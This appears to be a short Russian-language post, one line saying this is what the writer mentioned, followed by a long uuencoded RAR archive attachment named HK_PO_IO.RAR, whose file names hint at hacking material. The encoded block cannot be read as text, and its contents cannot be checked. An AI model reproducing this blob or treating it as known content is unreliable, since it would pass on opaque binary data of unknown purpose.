Вроде бы то, о чем я говорил... > --8<---------- Begin { HK_PO_IO.RAR } ---------- begin 644 HK_PO_IO.RAR M4F%R(1H'`"6%`T4-`$E"=G4S,@````9E>CW MH9QJW9PM$'84%1004'X/RSM4N-N;!43+VM>F=RZNS\'6R2R6:24`OOXD^?P*Q,F&*3C_R[S-DV`1*P&7,]+ZW24 M%8FFAV>=9F[YE\AT$J!D4F$M""/D-(OOV2P$ MO["='(,$^6F7Y\'!/8^R'&932?+/O1[YT>\;&*Z M:V?%&]#.=V-C&OB?&\Q5AH4HZ'W08[:(38-*C)($62<:I48!H%'.]&PC5OQ! M\IL:IQ[_4[2Y@&MT1ET.H84>5F*VBQ9#T<:YT9X+0<6V,ITYK0A+$83$N$BH MR:96/#6`?HR:V!+7RJ)7IB7A&J*E9TQ4D796]IZH^CD&FTN+@-5IP3R]98:I M_^LL-^/Z/D/EZ2K3UBN`U-YT`(`J`$=W``!S'P$``$Y<:%IA7[0J%#4*`"`` M``!(04M?4U0N2%1-%!V54,S,T=`5F]UYK6?!Z1?^1DQ``DKHVT7$W::2<:NV MNEHEQMY>I<@1(20B*(,(!:2RY,^/9\$?L34:U%IQI-)3+R36KDN`DBD:)!`) M`#+)=DM#^E&B0*`SSS>^\JA>WG=L.9]+4HYM:OFV- M"N[OG.[1T:M1WZ)#E>JYF[%K*.O3>LUQ\\VC6^L>I.U]E>Z^'23NW;:-$=YFVS5=9VT5[9'-MD M\=;9OG'AV>E#WZ]VWR;F$Y?#P=RJBX[6IKU6MUWGZ+8G, MZK<==S1@.C4>SK06ZZ5TVXK>W87FCIE#U#L=>?X#8_#3B$ M6W&F=&7EX]##H2Z&7/M9%PZ\.06;<[8;Y;H3L;L.="7B]3I#H\C&MRM1UY7Y M:RN6 M!5NF.A?*ZSG&V]+[%[Z/\>[VNSW_X^C(<]'_\[?:[_9_6GR^7L]_P]D_#L_- MW^VWA)_.Y_QW6?U>-V>U^G]G@7J_!V^[X?X_$N%][Y(/EW>\WX_'V_D[/E=] MZL&4.1<"<'Y&RCVN]X/D?U&&_O[9[7YN]W>W;S^O]_=[GR'[=KP][OL^7@ME M^-/,_M[?A[7;[_Z4ZW^/AM;_^KD_]GQ?%WAEIOCL:@SP[^E"9>MXO8/G;52N ME,H>_,V^G'F]%R]\A]]S!P/,7PZ'?\7!XFV1R+^_)@R#<#^B(3"'OI\6]A\S M?'QGM3LO*GP>-Z;GK.<%S[OW;:!Y9_?@7SA[4&-/CJYFI5=M!7'D-=W-INQ,S7]_]K!Y-QI&3+R MY]K\':YRGV>+@2,J9\$['XO$`0.CEY&*>(XTB1S_5G<2.HT6KBJ+9_FN](^- MLOXG-_<7D72+P?UO&.SWE:\5I&+.U3YL[=>@[&_VG.JTJ-XSPW5G]+BCE?T_ MR\W]"WKM;#FG5TZ*GE`:CHZ]3Q^,'B,FC4>UM&PYV:;NC6=LN>!T>#J6<(=K M+'D&^,GY,R9C<7U!]<:=BY?5!A.5<>FS^C.RNJGP4!LJVK'RYG%&694_+Z$^ MAE3EGZWZ40`6-6C]^_E^MO)0QUHX^8_D$LS`!@4&X%TG,/G M\>T>'U9MT>5TIO1"629-Z3_CZ_J.=:Y1;6/@AX#*'6Y&3ET'*`2XJFKMKNJ? M_(^?"P+R)C2Z.O&]I?GQ2(2RFEQ/?"?B5=B"D!0[&/,(-/[N/S?;YO/PG.AC M@^]ZKGL\WF8DGV>-R^5[?OVC_"^1C6U2V<7#Y7_QR?K,'`NHLX'N\GE?@]K$ M'=3L?&M%SN;;!B;^'D\_V?;YONR?>?@Z[,Q\4)BP:4<`@'A!#==RKHU:84K]C7T7AUS>J9_1L1=<`P)3[,PSK@:GBP MH:QR!M^Y>S7[_5F_?@[=1\Y.#:/?[]!^?KG^"JA!S"HC2EV&]N9T:&_ MF?`>+BX\T?SWCY;^=A7O^3QQ)V3&PGW_(DVCP=UGN*)OY63&*=5Q41,P8[+? M57H#^,!EN@6V^^MQ3^Y,F'JX-B%_MLOXM^1.TYK0J=AO*9V9S&O;X'D4'7]A MG![":"@R-@#R/W]XR6W;I/Q$?8,&$ND!3F`['>WA^EYOWPK[?WDI",D%W3\; MU3.S+,_+F&+S`&MF?XN?5#*_-CSYGG@I-W-__VA5@U`H7IN["GC^>"A0\ M\$U?%A%%E1D5<0;^\D<'`OFCP1V#2#YHTJ^Q,Z4W(R`E5FXB<(J$,_*Q8.\W3@&Z&70NG8*J' M3XF5C#O\`+A0[HIH@WN8]I.+Z'1'YC8"J%_`M;=%/,"@YQA__$Y#!*9*-QOG M]$,%/[L35^8&Y)W4VOC\#`P+@G'XG$E<_W&`HXSGM<_D^S!GCK>8E8J=+B^1 M966%/WE+Z01,^QS>?R.3SQK#C>W: M"\BY$O$TXS./R0Z7\_G`YRYW.]ODXEJ^:^IQ>/CSL7J2D'/`1,:9<*"^_%T9 MTY>/V`(\CF*'QO'/=56NX5R!5<'A\0^?YW&Y_&Y;G,\V^E>8IQ.VC\/&]OW! M]9O5*@5C/K]/H<(ZB4XJ^LS=(=9W0Y7'L)QG9ITYS1ZQ86_OVQ?68K M.+UNG;ZCC$G9*)LUPC@.+TA+BNOR\BNOV\^SNT"+ARKV'&N(=-_&)@ M7&R,-5[P]0KG.[5>KJ>)VH\[(S<^F'10\'4*"G:H9B!G;;L1S[1W->*NLKT')Y(7"F??A\/!XWJ>QY"7Y*MJ9@$1S_GY\!'0"K&[<[ M<;COJ8!_\"@$XJ#$;_@^M]W(Z$_)]7=_LYLMJR_6]KC^YM M'O8?.]^Z=:;S?01C#R*#?XKI4FGLX_E^"/P:5_EKP/6\%6D[J>(-6#N%'P=< M=FLP_[!A/G=`A`U`?B]";;AE3K>>U6KV-.F=M)1:$=UH$LS/_:^2R[;<@;#= MI!'/2T^9D8W5ES<>T'[:(>1#F#_7LEY$RAT)LZ?'R;\U6G M8UJ(>PFF"EJ;W\KX'D^_K3+13,KX"2A%R?X;@MFH\A)#HE&4XH&`B2S:.@#M5'^OF\,?J].=/H`S)\3M;3IW&:@?!W<9E"0YK?V M0W5T9HAWW\[(>]&X(T$=?*5U&<6\\C;F*6Q8O8A,3!IOV+/,1#NYN4=PP&_@ M\UO7G-PG)]@O!$/&17:Z>3)/AP[.>$C[_*9D).O-6[]HPN/2$+QSZ3H?J6G5 M`A5?;SNMLN57*XA\QY=9%+<0\6X^ADJK4LUWGEATQ%$8*7(!;Z=2[H:Y0:`O M'/`KFWMKK:,3MY*0U<=Z&*6F]F#Y:EE\F]Y>&%XG(!]RO*I2KYSY=AS,L4A@ M]73=U'B-*-F;>'OKNU,B'((+:'E7P]OT8-S3$+TZ"KGZ57Q5##T50;O#X&'P M6-.U[FM8\5OU@:QK6-3S4@^3V3$)*3US,'/]+3V?&,.HWJF.Z(Q0Q%N)B0?H M1.SB"C4[,IQ1"%_?S`!>E1M0]FT;+ZX`;KB"WAXK/:S]E?-58&.=,ZG1S:FP M-49@V&4(WU!_0#$:E38U7/%<8J4;8M5_JJ0O9E.[SMR'+40_P#^8#7GV3!-C MAETD03A`?=7KN?/1T2/08*X-$6STJABH!6D4A`1,'VC2"Y>4K)?(SWMU MVI2N71A\J=O+^E]<=[NT[8T@+6A%-@XMH-V0$8UL?2=U;``$,P:0AB>N-VRE MRMOS3'!*HW.V,(C`U?$\2$Z@$5>NX@1_Z*+?O),:"=\0TJ-M48+]4[&(&4J?/<&TJ/T#F;H/R*&":]MU$. M5!D%'?J"0]1O$QQ2E_`-Q;<$)U'](97JGT/: M;R*HKI">"HAI5=B$`E;B]``D_.L6<<;+W+_H`>M5A$(R-5J'#[DUR2WKQUY3 MG>0=`;=)K5@8"OQ`<%"AX MV"LKMD`.WKX8FZT`SL7=HYY7?AIT6(>9`U_NB!D7L],B9L!%[ZPU1%&(C` M$)II MN*_2]])1B@"T<1-!RD.$H51(8:*AT2S?R)OU,W83@ MB"4(`,L5-$E&)I.HAN)43%%B)G0A*R*3=3IULN;:('C"KGC28RQXGB>:I`SK ML(=V/)JYG_-E,DV4/Y469/E.?(FB$/EUGR`(!E`Z,FYKAS(W8+1HZE(`2WHK88:-*:*(-2FJ`UV>@F^\E MG@\L$[PR-)846I#CWGD5HQK-4O"2USJ(%Z[;HGE#DJH3T:E*C3V+G?^Q\0,^ MDU8,)&(/Z;8MPSH%0ZMU@)Y%%5@-=`F"KF,'*D*<5S4`$P5EUGF@7%VF&$ M[1C@XFP1F$\@,NS.ODX\Z;0"5^]^;40H\B-,5"BD^"D` M#M^"-,14\R)*6@+"YUX=LO.QNA*F@_WFZXXRJ<`WMKT4^X2A:=@R\'J6%.79 MXE]T&*.YJIJ2NI*P%3;X*3%"+MZ`(@V;H@"*+K[N@!2V'Q+4`W@471*($P#J MOIA/3([XV1&!UZGCI$^Z/^:NS.7M8,,8T>=]0Y;D7/?E?<.X8&I_< M$/>E8!.0$'MFX4KARN``@]Y_-_^D?%D0LG$0F7I5;>GZOI34S<=A@Z*T$0RV$)?`MP4/B-<3?ENOSO?1$/A0D"HM6>?5='E,>Q-QSWRFH(Q M@7O71QLF&)S8$&_V@H.1,2EQA^0L(^D[KDVRB^98N(V-:PJP4W:^0B_*'`7K M-.#VU`9PK2\)4(4%JQ-=9J[`W*=2Q6((AHV[0%IX"MZAW^*0M3"K68(;H6T M!<1*Y32`=@-[Y20SRWF[HQ1I.H>P5PD0%)@DN%10*@.,VJ+H5=)5>9J<\JQJ ME$A-66`=@>00RZJ'D,6)17`IZGX\QY5<4':P`>YZ]IT<)P0A63T?-8SGWI#F M-,Q]JE#X&"0RPX(\*_]QC;)(<7#41E>50C<#>[-,V3ED%@!(A$"[(AJ)B"IR%61)#%4@[W[*YEK/70=,, MJI5-R=^#B+?1U]F,36N\_[HQ3C=U')%:5!):7J5!Z0BZ(]G"`/CIPC<(4%/PQ M!?FM+9-_@EA0[UP(6Q9)/0_5\_SNE5W&==@+LM%#TM-U3%96?=8S MPY<\\>D#JDIS>03L&E0+0S/9KM9`RRB:#@^>IF.7H\X'!<2+SA)V;T&.'M)F MKUWT4FW(!(Y1>"8@W*3[2W82.[KQC*'EXJ`Q5(H$$NYCL=UV_)&/<46MO2G5(QL$"[9])C3XTRS6@#J!BK29 M]A$ALG/S;`+!/#78HHK[W2L9^P5"JE1PQZX-*L6O0` M@@U@=)3_@#+I'I+MY9JX[F%CHKVL%&Z3^[#K-I0D%0QH4J]KK+-V]G71Y^!T M%I&3+%U;Q,,6M.&%ZHE?M=WAJ^@(I7>B,O-PM48W[V7<]-A?H0U2` M%#4C`>&]L!AL_2%>A1'X6%-'>3F?23,"0Z96JI2YT<>4`O:/*!7N`U=6@;UT M/7Z`#<5&5='%=^)P$,V$#-/4W#29&T=:BRUT7O9__-FHJ->YE(@<>994F+Q1 M[K4=+BC1MN+I@*H[N&^9TIHXSJ+NW=N*CK!LF['9^D[5Q1!&IQJQ-H#6Q`WT:.N"?15B;S6HM?"Y^B^2V.GP#>/:Z+ZC`KC`_+? MC:V!P]R79+"(Z(&+55'9$> M36;$*")SM3B)>8X-[$^.Q0A?%)T;.8Z5:N";M9G4D3>;.O`DOA&*SCE4+\R*"-F'4ET@\J M.HI2$:WU8F0_(=KNL:1I.ETXG81RH@V`CG=":(=Z^)],#V/:`PG\`9=)M_;B M4+V(QD`Y,1$)Y<,.M%A^C,U$;L"2@5@:B7WFP_I*,KL86]E3.E-GT,J697HZ MDSL7R&Y$>TH3PYC8L-$:CI!F2K2V/L[XO.3@;HU`7`(H;LL&M M$SZ#Z5>>:Y8NT(,!;X(39 M\6V=$2D'^H/F'27H2I,@@HD-T['B=S#PP^RPH$!&A]5>C$\(TNT-%F<8?HFG M=.Q*)BZ>N.;FH^7`Y'Z2._/,&'`W@CS>U4##)71@19HYDPQ4&`)&6JE M[X+C#77>JJ6/%/M/DZ)C+D#B%:FP#>`/WXAE@*]6@2E:<:,NYNP`9U&.6X,3 MA+V'8:5$!;=8WZ$K4O0"[P"@0@.#"N-KHJ"(9M5?SA1\:>Q7+?2!&:YJM\M9 M9SU\]'0N`Y,N?/ZV,KLT,IP462G"JW>$(`,D*TQQ7](-?GO]B%%F8^.B)\<$(6V>3LH]"P:2WWP33%XB1*/[CE!\LLC%"7E=+:I65,ZLZT,K%G=5S@<-G7<>=D6PXM`3Z]0 MG/B<#@RN%P_2E>EP^%*X/`P6^(WPW;=$!CLNZ1T*=-V(,/0="S!'4D'#:U=R&"DA7D43%N1@!FY%U_, M1/%>TSA6YWKB:SE3,;+[)TYT/17\K*,G"?W[L#38CA52054,[T:0,(46Y@N(8%W,:\F93D[J-XF5BY(V!G7`LA_#+ MN"&<7(`#%_7%#J50DI[$&$8HRKC8*_7K>&,$16U:?B$P5/WA;VSFYDZPW1BX-Z"$F?RZWXG?G%'*DS6=>M-U$ M?*'I]]&PSW7QA1.EI.9.36$^>>M`'NJ)4XN-?EG=`SGME3L=S&FSRF+QM\O= M,P=@CNM00G>\"HUE@> MXZ$\[YWM0'?_D!\9UC2I!&3*Y=]B*>B+MI:+PS>$)0R`IWY+`$F-:K&)]7": M=71[B)N5AY8-/K(/1^G-PW.%(%#R!3,;-Y'VQ3.\] M-^?_7EI1BM_%R'Z'J&>U1+0B=$5/)"&_0\BDN`;%@HO_C[,.IO@RIE#N[:NV MK%OT-ORC/^*L@(VQ*.G?B21$&.A*A_G$'[7\@-"@QHF+E4UIAE)I[/T`#PR) M$P7[21DSN_N.8]MLG'QNDOA&&G"8I'!V$S&C]+P.#PFIJ\'):@CG3J&%S.IU.GP^EU,?\OX. MQ^7"P!_[GGBW^%!O2O5S[^+U%_?QL#_F=OUMWY_\T&>.X5;/=JE[-!HD[BBX M?G(TI\A_V&_+3DP#JFX\0+L3[[A!?^U4##6Z%DH,TU:(PU%`:`*S+&3U3DF[ M7LKN>)Q^=?A>U#!39U6+5^N&%;11L8#0VL3=*'[8W+5F29[.'N%=WM0N`AD@3% M0;`W`7$%DM9_ZBH*A'.'TJ$])ASB1X*S'7QZRE_C+%ZP^K*P;YKI8$'3>T:A MCA3(FD$!X8>[`6V+/V@]\W_S-([PSVL.?0'NH:#U^V'O/Z%"0.7D+_?O-V?1 M\]FQM,X0'K0ID].=UNK.RQDF3,<\ZLFS!X3DC7?8N& M3&\0$8=2YGM_)H/S.9..*DPH>@-RE>L`JGG%7T$Z+ MGKS61T9^[RMA+E"_ZN10@[$G78?N_W\M6HPW@SS@;@P=/@Z]I];[V]'T^!P_ M3\W@;P?2*V[?P8)'7O%YC%\&#)'[!(NP4:`/",F-YMB,\)(="B,!;LRZBZQA M#*?F\#:[_"9QO].1!X3P JM.DH8/#='G7!BZ)O(R_%X$D@PLG#VE_UDZ?_ MHG6"?5SZ*0$2(V;!N'17>L0(H)L&OML\4:\O3G^^SZ&7T>CY$+2N3 MX>!(_A@$6>9)$,!>4`5&,I1;G1H1_[UDO!B-PC!?$D'5(%Q5 MJ68<5`ZFZT'Z&^056!0&F=>9B[P+1_IR(,%Z?5G6^>GP^'O(#WFN*<9&.F6] MHP-&#P/3E8.[<+*<;_L5B4%<`[?D*3"0>^KN5>55J(1_-I-?^G+PAAW5ZLL- M9S:Q%A,L=>;0]7[!U+=&`[UBX\Y_VT_0[!/E3)O2M"3-,KSRS\#Q@)X)YO1" MAR)\02ACV4T6Y`!F4OXOT[=9;"(30!E^8BZ2'*,F.$$O*[(EGC$8R MD#[K+`YC"2DDM9(@U!+NRPQNQ7+[WV3-AC\;T5U_&.4%W)F22V0V$36P'[VS M+B0=P?WEEDA@%7+A M>7B'_T=Q(!K7@;/!"2_C.EGU1+XY:Y1-#"P/42",R.&I"N!I\2P'I6"4Y6^@ M-5;_#N:QWPM?,!".`9VZ:&[7$OM2H#]G4^TJ5G[*5)\^IQ0 MP#"*U6]%?R/6B?V'SFYIL.)`KMY;%U;%H%67?&CB7=0NX0$&%P]L'\C*:.5D MXLW(?&-:?@<+B<%SL9,3G;Y1G2GCT(6A M=GBK:>N_-.\EL4/I/2\\KI[XPK\1(X:`0E5KY!C8HH[4?$]Y.Y*^A@^N=Q@W M^;DMS'!K*=T3971S\3./S?\9#'A.?UTVM6$[*"&"7U8RE.$50F)]JAA]C?(T M=F4A-SDVX[2V!/@C:MSCL:\0WC&D#VS$@G0GT-D[XLZU8.$)S'TED-N"3"`S66_U4C3I8_@+D9L;6$A*T+I)O M0@Q50&]M37U`REOB@X:(W==>2!;0T.RATMF(`*`DA]CRTJ%)M#09ST:4@;9O MG#W_2(?B#-B)EAW_I+^$6"'I((Y9VZ*SAHD2I%)`F:\J.F!'UB)T;-8>+][B M@S'.D.=80&;HX\P;G^8-T4S=$F(@E&9OF[R'&D@^"'ZD:,)#G(Y/'VCV,/D< MK:?9RGPA\8&K5)UTC>4+$(#PPGGJ)JM-K1M584,HD/A!$[M7`P.%Z@":/YQ M)#*=T3D&EH-5`GAF0#5(F&1\F)4(K-?%,>@=!*@VH1M3#''5B1Q>L5U?1U-A M!:'WS!BV1^)$U#VJF>H91&2)Q**$:\1^=[.L$66)!A,U(!@T"02Q:)W,DI"Z MT,+[$"A!N0X)F)M6B:CHD).Q$;OA0CIJO5%57/25,!! MQJE*V:Q]3[M[5NW;[H'D$JLQ)YU;G,OAJ/FTS,ZE,8;9Y7.DL-$$@2'CP490 MW"$HAS5@)S)KIKK&01MBQ-)$7Q,B<5#)!3(;LT$,A MDE'A763>EADBM#3AJ51LF13,EJHPK>>C0R2;PD-2J>.+'A=B"ZTP&A[0RI\AMT&`$ MCOSS7"K#L4CK"#N'VL+J5L'SO:*(,]Y>TGQJMAPN.I%+Z**3F[&=:82YT<=6 M;<-*Y:$=NDB#A_$S:KI7=(IVM+TBJ7KN)B_SQ:1,Z=`58&*NPX+2O2NI-ES) M4_+D&]0)H"G:#%-MG"C*`_W$[N+V,=EQ#+2&AW>.?S)?5F/E7L7D[>[$[+OH MD3._`+9-.(?7$60D)&F`X[@M`.150I>PYS/LF"_WC_^4^E-H3(F'23&;GS55 M4O[ST!>X+\)D].4?N%1-]7([$14;53A$_[M'\BRVY#L]1@!(]%!*H'QCB9 M*358W"JXGH0,M( MC%8(WMYI!S!";]E[)GF"]$V[*F:O3-2:)=@FHJY@H_%:H(CL(R+F;T-D("40 M$G['7H5(4)I`,^RKC4G?8R=8*,CI@"RLJJMG2$80+(-L]>I98LD14J>83!!V M?)!!5R%*A2;IZGT/V>I@2=47RD`2[9Z=&(U!T6R(V+++FL#E&M!2ZV@:$A1^4Y MJR$^)N=UWOG69OM)&GEH<_X$D%<3;+`T2?;(MAMI#-ZADX.^20DJ9-)2>4VQ MH$03.\HPY^E(%^/62@9&/#DZ707JC&VC6,60>>+K8^8,6U4UMP*8P3"56V/% M"%>.K/_$=&2$S&GG"&7-"U*[`%^Q(C30K'>1XJ)=)010"R3U`TC&.:K=I,DX M1+0L*S=M%]5EQ:&CP566'E8[4J,?(E%J38L)CNJ-PL\3U:3J188GOH+W&-1H MCQ9L^6[''1NX&;DX:$"HQU[E8*-J5==*6@`@HE(VP_GNBZ89K!B^!>B<@DVI MH9UD7U\:;'6&B"-G8J1$?B;8\J*=G(R!E3J/O_N#H)?5-'...!.`:IP5E"-' M*6"_46G0M!*.M$0A,_:%YB)0NK;)Z)Y9#?J.R56<\-4%;9;M'\R$Z_572@=- MZ`&N_^ZM.BN]EC=S22!D3PZB*7VG%'.;/5MO@8_3Z)V2Q,=:S&EFE@SA?V!= M-#>VB#%PR#\E5#M+O(Z`I\1?!T51O[$)JXU6VPYLE"\`WP5&RR#CZCO@_&&E MCM05?^#G8$H#N&S:,+E'=9:\XG'U<#]1?'"OQRWA*[?E$UV(8&*QCSB6NX'T M$Y.$L8,>=*S"+;%%-8])E9%3K96A_^4D1A6#:IRLV#J):BE+`&1/*+KZ-M#H M,.-,/;`AK2;E+5<*&"`[ MAI2J*AHI*F=9J%H7=B.)%!8"9$%<686"CK8_QF^<0ED4D^Q>B)AS-'7Z-Q'2 M2BJ;<#<<2&8LD1*HARL*A_T($&11+T<];2+:J@08O:)E(+DC50>):`65O`#% M>_I)[$QIHM"HN4`T_FL4QCCK7R6R3+$LKM2,^&/4[!&_%;1"G%#;@JOF[D`3 M!WDCD;5NB]$X)6F*2!+3OYE4IEKG(5%:FFBLU5SQEN06 M[[+!D(A(*KOBT:&)IN#%6*G(T170Z%5'/;`#<-%:L4"8VFPFO3LI,]&U6C62 M>%`OP>#]W9-A0JIKSA(;=;F*.>KBW,368)7J:UC*P\GISG M?GZA\WA4#-ETT%T2M$6,5""7,FRYO@@K#PF:Y"6C04Y\KH-8.%=XIK[.^<[@ZILBZ]X% M[:)YJR=R"Z7W44M!D:T9X$JWBUY6RU8:THJG@B"T=OJBO145+\X^P(4[$?,.>\?O MUV55\);F2J\A*;_Y#/&^%<&[S`D/,NI>64P%/BZFRN&H37^]FD7!7+[;)HVE\ M=>^1U:>*#=E:&:3TFTJM1'VY3,-_4I8[_* M=/QY?P8[@]AX3#%CO@?%#TH[`HZG(<2;+7-\] M7I.4Z(&GHQ<9]LO.#"92-)S\@C'),M>*N*GEIC3,4_'@X'I[(P^=QN?QU"+)'K4./CL43XF*V4E3$)TUW:=-:A]@)G5Z%`R%X\\MK M5Z$9?NGP\"1<5'RDN<1^L635-&5`Y:75^MW[<#"P&$R]JJQQQA8U0 MV*7MP?9T+8Q.#'9NV/"V`)`+R2+&.F6261-SVBBDEGVW9](&!-&&CKP6* MB1-BX_=/"YD$SYF2Q/1\3)XV2M/#8O57/$SLX3OKRQZ'V,/D?DUR@6ZH%(F9 M3)+A)B(R,=8?`SJ=C3JP`,(/2="SZ*S>=!IP%U$\I*9,J=\+M?/:==R&YSL+ M^=PMU).1%H]";D8N/EXTR(5NA)(]8P-X'^L/RN9Y67BT&@]^\GH?1>5UNG-Q MYE[D\7I3*&3UC`Y+V^B8'DY3ZE#HK=8O[D_"/_8WDB_.?D+RKM&3)^[TMK?" M_&1RHGV67@XF)-Y.7-QHG3]*/]9F*65&#[XTW*_EF:IAOHFA/T,)_BN'--A2 MJ4/+%U3,]MZC]%57S%C%S8RE7U8]35(;&C<*]_9"PS?.1]@VDN.=+%Q1]"*O M*VQ_KO"3*#F/`@,B'H2HN^E']"X?$E2*I1A@/;ILGV#?,2QV#S'D-A>%3`K'[SX\P(O?9Q.<'(2_K4*17/6)VJ_$ MHZ*Y7/X$B1=#0F0$6/S-I@D6?:9*OO6)3!4>]LMABE:B@K_A.Z>0X((`YSYH M6/!NS7T56[*Z6&!"CXBV@5$=W7V53XB5)0TKI?PG7V_]'U$J3ZM\2#W-[HHQ-LN:K&8:=B&4J$FTK.IT3:]D37T*.V%N`S?31'> M,88!IU4O9AW>VY^OM]WN>'M^#]^^WPG>+,#X:!YY2BVH3&E,FV?2+)*'5"J] M/A4K-I-%V2N4Q0,5)E<>I/*<^?ES+YC5N;HCTOA%"/FP08N6[@3:'Y-A=YK& MD%IX;!C+DR'V"ES<,E92.5D3YF+EY5QT)Z3*VOS/[[`'US4/!(RU M',2P$G7A"A4^'22(Z%%-8/E?U-.K$.[+7(0NM&(7M(B$L]R%KQ6!NBBUX,E>*QA.> MCZ'HI!@!6RR7VYU*NBRRU//YO-Q#NRPJ)(HB;]L;#8`U`XA"LU&S56PKR\=< M8S_]KP?_:;ZL=M`E/ZN!)&629L)#8]"N+?F,BHZ9ZSR-^SW@^:(L7W90.R"[ M67R:M!]W6]4D:JO/@D8W*"9D,;@OCFS*H5LAZBJQIT[*.W'=[Q(X%E$"Y[%O ML0E[PM*"R9P!-X?]W.]X/#V>U^O^/;_=^^X1^OM_'_N`([O96$JN%>KKK*!Y ME%()5=C=]@P+*66+JA_\UUBT+;/@K#Y%>[9SQVB2+Q.)]Q`IJ@_%-A4JN>"> MA9N2T:WR%BL!!KDGX2@)$EZC9+=5:U"<6A,Z8]>IRNE.^""T&9-4,5[6/PLER!YM"WC]UEAY M-A@2/@A-[[.D9]_"P1LD)9A`"VKQ2SPE8.]4G=C=^=UXX+"[)(EQS(;OH$V%_C-H% MTWZQ"FW`O]Q+)\$F(T?7'0(>B9!'%62/$DXIO0&X=A/-&/?'-(N?7"?HB6SX M\':[WP,,_3\?;)5M,U)(L"T0M]+OGD@6"O\PZ3&G0/U0=&C]''2V]/T?2[&ZT M3$F;C$BP<[_H12_"D4*?W.9*U\U>4RZ'5R3-X%_\$O*OPS3)P924C#+QNK?] M9>@@YR?=7-4F$OR!$PT<:T/:\';_V,2@\5)4I\$2EN(*D#3:*LIWQ5>C'+1` M+=16,RBCB7@8M8]5#6B%F*4E!X'<]ME$]59Z.G*!3RQA;!5O!#<`N%#NDEL#0>K0\_50ST6ABKXGA=5`:92UTZ6O';>>L5BK8UA>WPS" M\58`V:/7"S.<0$2,0W2Z`RA4AT>/#$VF\IO" MI*ZCN?8M0%6/".Q^>%N9&CM_&=ID M5N19 MNT[\LO(GW[E[IU62);XQA9I!%UC8-2J[Z^B.X9+%5IO:4Q86M]$^@M[2!XO$ M7M(`!N'1/W;"">YNB!EOH*)>Z/\(J_A(&:82/JQ#V#Q^*?0W;M*4P M5!/\4."\2R7`(@V)%IZ/7K5DT>^AF6YA98 M`]SR=5'L'TR2![F2X3B@JUHQ M[/YXYVE#*R*K:&OO85H96<]4CVK>99OIK)EVWAO+^-;(:6[_C94(`](G M;FX?UE=NE'@6+J!.TG/SZ*3D_3-V05:Q8$U\%%R`^:P^'>8%X_D'B]SI>-<,R.D.GX"\##R9>+Y(. M@4_S>>HU$4/=[N4GN^93[)FQ9V0B\";O:L=HYDVQ9)-N;26H>"]G(;PVZ#G- M"V;_"!7T9(PK9V?TF2\'>^)R,JVH\75482-")OO#`]MV0BI M2*A%!EU';,R&J6+W@<&^+V$L,>PML=P^0UT2KBG/Y/(<]KC8CGI2N`O`4QJQ MO/%_"ZX[0:AW741LT1^'HFP31\BCPB2;LZCQ]F^AYTU"ZHA++B.HWY[`DNVS M!5CP^?-2J25]2O!6_UJ,%+>!F>3V*>>71YE\G(ZLO)#ZZ'0%[/@I[PU6R,<4>@"+9D+>S6H.49 M11^=X(/_C35B3M,77C11E:*I4/0[B2,N/!/->1RV?0*>:V'OK*H"6;/98SY9 MI`C:=^9,S14SB:4MLP^-S,0^*@;A,,4C?RLCHS@!(G[(,NMM1X5@PK,2,<`$ M62@M/=F="WM8[P\GJ&M=<)/%P47!2VRQE.1AX?M2/:Q,3G2.1S+?N=S^;[WO MR$]R!R.5R^-SF2]1![1?8V>UR(D7[$NA-Y'VX,;AKZ3&%6]5/$9[P;VGAL)2 M#!]9=U(6NSY4)MTSZ!?-4;QB9W/EC%&9^;;[5T5FQU!#0^=39(9GJ`-'<4&K M>JT7)9H$]\NW?DVCYOW_\>'M]_N_[_*Y_#Y/!\VV1QVZ2`5 M=$8\C*`61!9<=JL]:R]IMS>D9&MPX'&!\4JVR;#>N8F)[=ZJ7CQ/9]1YD8KQ[=\OKN<"5@2MIDN>DS%Q[@&XG#`,^ M??\`<;@L,=I"_QB;$\3(*C)?)D6ZR!SY(]5ZH8P&0( M'-.CY8W#%^0';[";&Q(VKV7@R2E_`Y9W?$#K9A)JG15:CQ6F"-R`KWLUWR\L MOG&_DJP]Y'@./3AY1CI[A,:C,O3K;F8E\LA9*SQH*P2+)$-[)^,$3_3"L9_E MSN;SF2^(5N9'>,ZWI"!V#]`B\#;P2/< M#%)7WU1V%]&+%6F$32/J8W'@]\\PZZ@!U1OQ?12+4D9(K!/,0V$,UD[(*/^J MYB/YI7I#%]QCP@*_-DSLG:9H[&"HTIXL&.;;OR#_@ZW&VK:1^J$O'ZDIL,;? M;)VL4YE1IAU.-?L-7-PKZ5_!GTDG2+;XH)-_XKV&RGNNC.*#UK\G91L23D=G MT6"$*BZ4RBB.T>76..(\=#(2,B*[^V;5]E@+UOB2!1:YOEE606USV/<_!B<_ MC?Y(W%Q(`Z]#`S*Y](LSB2O4 ME>;OT_BR,@128L5U3P_CA[+@RA>OV_3^+$YT]@(`XD"8C#%5(-2R8*+IIJF8 M:HTZ*0BR]^I?7VOW@T+(AZ0[Q$U6GF.9B6K$2@.R.VEZ)9Q)'O`7;YFSMT>B M["21D98,?SYD^>/\E0N8?+]@"\97U@1(^Q-$D<(+V'@@K/J M8X1E&#)?KC=S:Z0_S(?4;">#*B(G":`$V:M!6+1+5E!RD6,$]ADIZ M((V/0_QCU4.F7)^7UY6+*6J]6U7&J"-DER`=Z+)*/H&2VI,X]XN`;Q%0&QUS M79[U`7+NXPB5?G`WM*S&0L-DI3Q-X"/%N=60G0]S^/R2,%@0*-XK!\#`/&PTPAYGQ$([<RO8G9I[CB%_!C3&10W:.XN*8*R/0>)Q+L=MN<=N M-=KK?>=:;JY\B_O](8=TXDD2KSFI'T#!BT.<$?1U#3$&@#03465%4]9P;,$' M#)UI0&T`VJ+(W%=>A]E(-6@H+2S!Q`)7`Z`/E,@DBFQCNK M659<'C*%MI=;[^Q6N^0;/T*K*VM9?=I#H[1+6)(8 M-A:NF)(GS;L`]LD$]*?E^D0`"H]\YWS[U1AL>UM3QZJP2-<5 M%IT2U$[%>SG1>.E]^_]BE96R@[PLRC:H!AM/)51];+:8H>C MQMA+=&OH1[TW?J[/R]OP]ON]SMF4,^]VHU#VFZ>6E"@NIL\9*[M5)9*2%J(_ MD3%7=9'^WZY8EJRPZ)'J0A-_KL82V%BJGC-2Q(BZ;GA#_1J=]'\$O''N<"-I M3+R(_3;SIY;?[X?L[SU2_OV,/D>>`Q+Q<4H*(T2[127!F0+,`]UAO?2O^&@D M]-R>NYV4=M(>IN?86.J/5]\Y^NQK!IJ/4M,6RUS#I??[?R_Q<\/?[W\>[W/#^]SP!P%V@_ 